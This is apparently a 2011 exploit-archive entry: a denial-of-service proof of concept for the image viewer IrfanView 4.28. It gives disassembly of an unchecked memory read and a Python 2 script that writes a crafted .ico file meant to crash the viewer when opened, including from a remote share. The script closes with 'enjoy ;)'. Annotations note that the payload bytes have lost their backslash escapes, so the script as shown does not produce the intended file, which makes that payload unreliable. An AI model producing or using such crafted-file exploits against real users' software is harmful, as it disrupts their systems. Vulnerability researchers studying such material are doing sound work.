
# Title : IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS
# Published : 2011-04-10
# Author :


# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.04.07
# published: 2011.04.10
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: IrfanView 4.28
# App Url: http://www.irfanview.com
# i_view32.exe MD5: c6d9383c4119a59aad70dbc4a974b8b4

# DoS is caused by an unhandled Access Violation exception (invalid read) in module i_view32.exe

# It can be triggered from:
# Local: C:\Without Transparent Colour - DoS.ico
# Remote: \\MySecretServer\Without Transparent Colour - DoS.ico

# 004162D0    8B4424 04       MOV EAX,DWORD PTR SS:[ESP+4]
# 004162D4    B2 80           MOV DL,80
# 004162D6    8AC8            MOV CL,AL
# 004162D8    53              PUSH EBX
# 004162D9    80E1 07         AND CL,7
# 004162DC    D2EA            SHR DL,CL
# 004162DE    8B4C24 0C       MOV ECX,DWORD PTR SS:[ESP+C]
# 004162E2    C1E8 03         SHR EAX,3
# 004162E5    8A1C08          MOV BL,BYTE PTR DS:[EAX+ECX]             ; bit test on the buffer passed in [ESP+C] (byte index = arg>>3, mask = 80h>>(arg&7)); pointer and index are used without any bounds check, so an invalid address -> Access Violation when reading
# 004162E8    22D3            AND DL,BL
# 004162EA    5B              POP EBX
# 004162EB    F6DA            NEG DL
# 004162ED    1BD2            SBB EDX,EDX
# 004162EF    F7DA            NEG EDX
# 004162F1    8BC2            MOV EAX,EDX
# 004162F3    C3              RETN

# Flat PoC script: writes one crafted .ico file to a fixed path on the C: drive.
# The reported effect (see the header notes above) is an unhandled access-violation
# read inside i_view32.exe when IrfanView 4.28 opens the file; the script itself
# only performs file I/O and prints two lines.
#
# Python 2 syntax (print statements below); open(..., "wb") expects a byte string.
# Python keeps unknown escapes such as `\W` literally, so the path really is
# `C:\Without Transparent Colour - DoS.ico`; writing to the drive root requires
# write permission there.
filepath = "C:\Without Transparent Colour - DoS.ico"
f = open(filepath, "wb")  # no with/try: the handle is left open if write() raises
# Crafted ICO contents. NOTE(review): as rendered here the literal is made of
# `x00`-style runs with no backslashes, so as written it emits ASCII text rather
# than the byte values the disassembly above refers to -- presumably lost in
# transcription; verify against the original publication before relying on it.
poc = 'x00x00x01x00x01x00x0Bx0Dx00x00x01x00x18x00x30x02x00x00x16x00x00x00x28x00x00x00xFFx00x00x00x1Ax00x00x00x01x00x18x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Ex17x14x1Cx23x14x1Cx23x14x2Dx26x16x1Cx23x14x1Cx23x14x1Cx23x14x35x27x24x36x33x35x2Cx33x4Bx2Cx33x4Bx00x00x00x1Cx23x14x1Cx23x14x1Cx23x14x1Cx23x14x1Cx23x14x3Fx39x48x48x54x67x33x29x34x36x33x35x2Cx33x4Bx44x46x65x00x00x00x36x33x35x56x58x76x64x67x87x35x44x4Dx1Ex17x14x64x67x87x65x78x96x35x27x24x36x33x35x2Cx33x4Bx48x54x67x00x00x00x27x34x33x65x78x96x65x78x96x48x54x67x56x55x67x77x76x98x44x44x56x25x24x24x3Fx39x48x44x44x56x48x54x67x00x00x00x44x44x56x44x46x65x36x33x35x67x66x77x65x59x90x67x66x99x56x55x67x25x24x24x3Fx39x48x44x44x56x44x46x65x00x00x00x77x69xCAx56x58x76x44x35x2Fx77x76x98x76x6Bx98x77x76x98x34x46x2Ex25x26x37x2Cx33x4Bx3Fx39x48x48x54x67x00x00x00x65x59x90x44x44x56x55x49x65x51x47x46x55x56x58x34x46x2Ex36x33x35x36x33x35x2Cx33x4Bx2Cx33x4Bx47x56x76x00x00x00x75x69x88x55x49x65x52x55x8Bx46x43x44x36x33x35x44x44x56x44x44x56x3Fx39x48x3Fx39x48x3Fx39x48x56x58x76x00x00x00x67x66x77x44x44x56x55x49x65x55x49x65x56x58x76x65x59x90x55x49x65x3Fx39x48x33x29x34x3Fx39x48x56x58x76x00x00x00x55x49x65x55x49x65x55x49x65x65x59x90x67x66x99x65x59x90x55x49x65x3Fx39x48x33x29x34x44x44x56x64x67x87x00x00x00x4Fx49x56x55x49x65x55x49x65x56x55x67x65x59x70x64x67x87x56x58x76x3Fx39x48x2Cx33x4Bx44x46x65x54x69x8Cx00x00x00x55x49x65x55x49x65x55x49x65x55x49x65x65x59x90x65x59x90x55x49x7Ax3Fx39x48x3Fx39x48x56x58x76x65x78x96x00x00x00x65x59x90x56x58x76x52x55x8Bx65x59x90x6Cx58xB0x67x66x99x52x55x8Bx3Fx39x48x2Cx33x4Bx56x58x76x77x8FxABx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
f.write(poc)
f.close()

# `\'` inside the double-quoted literal is an escape for a plain quote, so the
# message prints as `'C:'`, not `'C:\'`.
print "Done, 1 file generated on 'C:\' ..."
print "Open this file in IrfanView 4.28 and enjoy ;)"